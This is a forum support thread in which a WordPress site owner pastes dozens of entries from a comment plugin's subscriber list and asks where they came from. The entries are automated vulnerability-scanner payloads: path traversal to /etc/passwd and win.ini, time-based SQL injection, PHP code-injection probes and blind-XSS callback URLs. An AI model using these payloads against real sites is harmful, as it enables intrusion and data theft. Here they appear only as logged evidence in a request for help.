• Resolved BitEdge

    (@whatwhatwhatwhat)


    Hi all,

    Thanks for the great plugin. I tried 5 of the top ranked comment subscription plugins and this was the only one that did not conflict with my theme!

    I just installed the plugin and already on a couple of pages there are dozens of crazy entries in the list of subscribers. Hack attempts like injection attacks and penetration tests. They are pasted below.

    Where do these values come from? Were they submitted as emails in the comments field? And why are they in this list if they were submitted before the plugin was installed and real email of commenters are not in this list? Should I remove them all?

    Thanks

    
     %2fetc%2fpasswd
     '"
     ';print(md5(acunetix_wvs_security_test));$a='
     ";print(md5(acunetix_wvs_security_test));$a="
     (select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0
     )))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
     -1" OR 2+141-141-1=0+0+0+1 --
     -1" OR 3+141-141-1=0+0+0+1 --
     ..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.tst
     ................windowswin.ini
     ../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
     ../../../../../../../../../../../../../../../proc/version
     ../../../../../../../../../../etc/passwd
     ../../../../../../../../../../etc/passwd.tst
     ../../../../../../../../../../windows/win.ini
     ../../../../../../../../../../windows/win.ini.tst
     ../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
     ../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
     .\./.\./.\./.\./.\./.\./etc/passwd
     /../../../../../../../etc/passwd
     /../..//../..//../..//../..//../..//etc/passwd.tst
     /.././.././.././.././.././.././.././../etc/./passwd%00
     /.\./.\./.\./.\./.\./.\./windows/win.ini
     /etc/passwd
     /WEB-INF/web.xml
     1 waitfor delay '0:0:3' --
     1'"
     164'
     1GHlQH3a');select pg_sleep(6); --
     1some_inexistent_file_with_long_name.tst
     7w8g5ZR5'; waitfor delay '0:0:6' --
     ;print(md5(acunetix_wvs_security_test));
     C:WINDOWSsystem32driversetchosts
     file:///etc/passwd
     https://hitmUVUdNdJvD.bxss.me/
     https://some-inexistent-website.acu/some_inexistent_file_with_long_name?.tst
     if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=
     index.php
     index.php/.
     invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././
     JyI=
     m3GgSGL5'));select pg_sleep(6); --
     ucEg9ldh';select pg_sleep(6); --
     WEB-INF/web.xml
     WEB-INFweb.xml
     !(()&&!|*|*|
     %2fetc%2fpasswd
     '"
     ';print(md5(acunetix_wvs_security_test));$a='
     ";print(md5(acunetix_wvs_security_test));$a="
     (select(0)from(select(sleep(4)))v)/*'+(select(0)from(select(sleep(4)))v)+'"+(select(0
     )
     )))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
     -1 OR 2+294-294-1=0+0+0+1
     -1 OR 2+943-943-1=0+0+0+1 --
     -1' OR 2+427-427-1=0+0+0+1 or 'X90KLkLc'='
     -1' OR 2+735-735-1=0+0+0+1 --
     -1" OR 2+608-608-1=0+0+0+1 --
     ../../../../../../../../../../windows/win.ini
     ../../../../../../../../../../windows/win.ini.tst
     /.././.././.././.././.././.././.././../etc/./passwd%00
     /WEB-INF/web.xml
     1 waitfor delay '0:0:4' --
     1some_inexistent_file_with_long_name.tst
     907'
     ;print(md5(acunetix_wvs_security_test));
     A0HjJyy4';select pg_sleep(8); --
     C:WINDOWSsystem32driversetchosts
     dJ4Thxyt'; waitfor delay '0:0:4' --
     https://hit2AEhkeIVIS.bxss.me/
     https://some-inexistent-website.acu/some_inexistent_file_with_long_name?.tst
     if(now()=sysdate(),sleep(4),0)/*'XOR(if(now()=sysdate(),sleep(4),0))OR'"XOR(if(now()=
     index.php
     index.php/.
     nCwJHPtS
     sample%40email.tst
     V5pZQ2J7'));select pg_sleep(8); --
     WEB-INF/web.xml
     WEB-INFweb.xml
     xI5GNEWF');select pg_sleep(8); --
    
Viewing 1 replies (of 1 total)
Viewing 1 replies (of 1 total)
  • The topic ‘Bizarre list of subscribers’ is closed to new replies.